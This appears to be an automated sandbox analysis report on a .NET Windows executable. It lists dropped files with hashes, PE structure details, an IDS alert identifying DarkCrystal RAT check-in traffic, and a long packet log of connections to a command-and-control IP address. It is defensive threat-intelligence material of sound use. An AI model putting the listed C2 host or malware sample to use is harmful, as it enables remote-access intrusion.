                                          Entropy (8bit):4.306461250274409
                                          Encrypted:false
                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                          Malicious:false
                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          File Type:MSVC .res
                                          Category:dropped
                                          Size (bytes):1224
                                          Entropy (8bit):4.435108676655666
                                          Encrypted:false
                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                          Malicious:false
                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):4608
                                          Entropy (8bit):3.967394647896059
                                          Encrypted:false
                                          SSDEEP:48:6bpIaPt32M7Jt8Bs3FJsdcV4MKe27uksrqS0mvqBHyOulajfqXSfbNtm:3aPVPc+Vx9Mu1BvkccjRzNt
                                          MD5:7C3C91E610B460C5F5D5E14D15564E80
                                          SHA1:7D827BD004A10E755AA239B1B434F5896D4F87A0
                                          SHA-256:4F7DC2183564D2087FCA596CE5D0A32197D7365290A8F95A58776E2F9593BB88
                                          SHA-512:C153DA774B41AAEF45508BE3389E0C4F43C880CF1684FA0A95AAA94454EF3A2BBEC7B0D288ED6815AAFC1902D99569E7871AB168C071D5C417B144582DF4E4EC
                                          Malicious:true
                                          Process:C:\Windows\System32\w32tm.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):151
                                          Entropy (8bit):4.852327883076639
                                          Encrypted:false
                                          SSDEEP:3:VLV993J+miJWEoJ8FXKp6UTfLRvoTCqLAHKvj:Vx993DEU16KfLG2HM
                                          MD5:AF82123D2A9868A9D39F3121AC90AC1F
                                          SHA1:A102D389888B621EA13539E9B67EA18D2B5EE2A2
                                          SHA-256:DAFB94A9D496EB309F8365FE9E656220B5E13A2B5900F6CF359F146F177C1AF5
                                          SHA-512:2AD08AE1E3392ACD642577F6564055FC88C4613A09C55DFE3B86103D5DA9700A40BF6C7F91A5EE56E84CC723AAB0E6D5BC38C6FA0097B8016418EAE5D9645E3D
                                          Malicious:false
                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 13/09/2024 16:27:25..16:27:25, error: 0x80072746.16:27:30, error: 0x80072746.
                                          File type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                          Entropy (8bit):7.993950820060533
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:84JufgBTrA.exe
                                          File size:3'511'394 bytes
                                          MD5:3c9cf0b38226e2a7f0191a0130536859
                                          SHA1:87d531257a15e18b50fa341bce9ac3c5a71ba80d
                                          SHA256:4ac2ddb4fa2d1917ae491b5ac623e7ebf23e5e34667c63e5acd433cc6696c23d
                                          SHA512:ad6bc0c26b6adbb7ead5db17fb4fd4285bcfd623531f41ad6ae31e97a1e760a59f36de05eab0e298e0892fea03d4a4c2ae389d90036c784edb44e61d7a8161d2
                                          SSDEEP:49152:uGmcpg5vS+c8OorsMzNRK6v1hFXefh0iMB+0b+N/uyVbVihyXYuIS:t0vfxoEe6vHFXgh5cb+NhqlS
                                          TLSH:2CF533C098C0BAC1ECB3EC75869D46E521EA85B715931E7EB23B7F9BC47E2011D486B1
                                          File Content Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`.............................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x402e5e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e0c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe64 | 0x1000 | 504217ba641b2f774b5f055155b16ba3 | False | 0.5498046875 | data | 5.288143571494792 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0x370 | 0x400 | 84c5330df637369dd4da3d84a91b8d66 | False | 0.3759765625 | data | 2.854832632722979 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6000 | 0xc | 0x200 | 3e52e1078a0b59d6e1786202443d2efe | False | 0.99609375 | data | 6.4705117449791265 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x4058 | 0x318 | data | | | 0.44823232323232326
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-13T21:02:22.831881+0200 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49734 | 31.177.108.211 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Sep 13, 2024 21:02:47.754405022 CEST5668480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:47.832813978 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:47.837673903 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:47.838205099 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:47.838259935 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:47.843338966 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:48.191454887 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:48.197088003 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:48.197869062 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:48.591243029 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:48.733670950 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:48.733756065 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.174717903 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.175230980 CEST5668480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.176461935 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.180253029 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.180325985 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.180430889 CEST805668431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.180603981 CEST5668480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.181322098 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.181404114 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.181514978 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.186378956 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.535268068 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.540303946 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.540381908 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.540505886 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.943908930 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.035171032 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.102324009 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.235049963 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.322495937 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.322762012 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.327660084 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.328046083 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.328119040 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.328141928 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.328262091 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.333326101 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.675854921 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.828222990 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.828249931 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.828320980 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:51.100763083 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:51.160144091 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.253108978 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:51.457053900 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.947653055 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.947930098 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.952518940 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:51.952795982 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.952894926 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.953161955 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:51.953273058 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.957679033 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.300848961 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.305879116 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.305941105 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.305969000 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.334920883 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.340194941 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.340377092 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.340390921 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.341507912 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.345479965 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.396083117 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.451704979 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.452939034 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.522092104 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.529330969 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.531651020 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.531744003 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.539017916 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.691551924 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.698717117 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.698839903 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.698853970 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.698896885 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.698976994 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.698990107 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699001074 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699021101 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.699040890 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.699168921 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699182034 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699193001 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699223042 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.699234962 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.699441910 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699482918 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.705302954 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705316067 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705327988 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705339909 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705352068 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705363035 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705367088 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.705396891 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.705416918 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.745944023 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.749012947 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.799969912 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.800139904 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.845072985 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.848846912 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854127884 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854156017 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854182959 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854208946 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854213953 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854231119 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854234934 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854258060 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854262114 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854285955 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854289055 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854304075 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854315042 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854330063 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854356050 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854362965 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854389906 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854415894 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854435921 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854443073 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854461908 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854469061 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854485989 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854496002 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854513884 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854521990 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854542017 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854548931 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854597092 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854623079 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854649067 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854674101 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854700089 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854747057 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854773045 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854823112 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854855061 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854882002 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854907990 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854933977 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854965925 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.859949112 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.859976053 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860002041 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860033035 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860101938 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860142946 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860193968 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860219955 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860266924 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860292912 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860323906 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860351086 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860416889 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860443115 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860469103 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.878978968 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.883826971 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.883897066 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.883924007 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.101778984 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.238271952 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.433398962 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.535150051 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.560600042 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.691864967 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.692433119 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.697487116 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.697566032 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.697665930 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.697696924 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.697745085 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.703824997 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.047341108 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.128917933 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.232031107 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.232038975 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.237004995 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.237128019 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.237287998 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.237318039 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.450277090 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.471155882 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.471303940 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.476547003 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.477305889 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.584763050 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.584965944 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.709141970 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.709676027 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.714539051 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.714606047 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.714617968 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.714677095 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.714803934 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.720433950 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.907582998 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.066536903 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.072614908 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.072649956 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.073213100 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.129013062 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.494278908 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.628921032 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.655364037 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.832024097 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.832808018 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.832830906 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.833106041 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.839494944 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.839607954 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.839740038 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.839948893 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.839981079 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.840004921 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.840029955 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.846395969 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.191507101 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.197361946 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.197400093 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.197427988 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.575354099 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.660176039 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.734886885 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.957158089 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.958065033 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.958161116 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.978801012 CEST5669480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.983990908 CEST805669431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.984066010 CEST5669480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.984200001 CEST5669480192.168.2.431.177.108.211
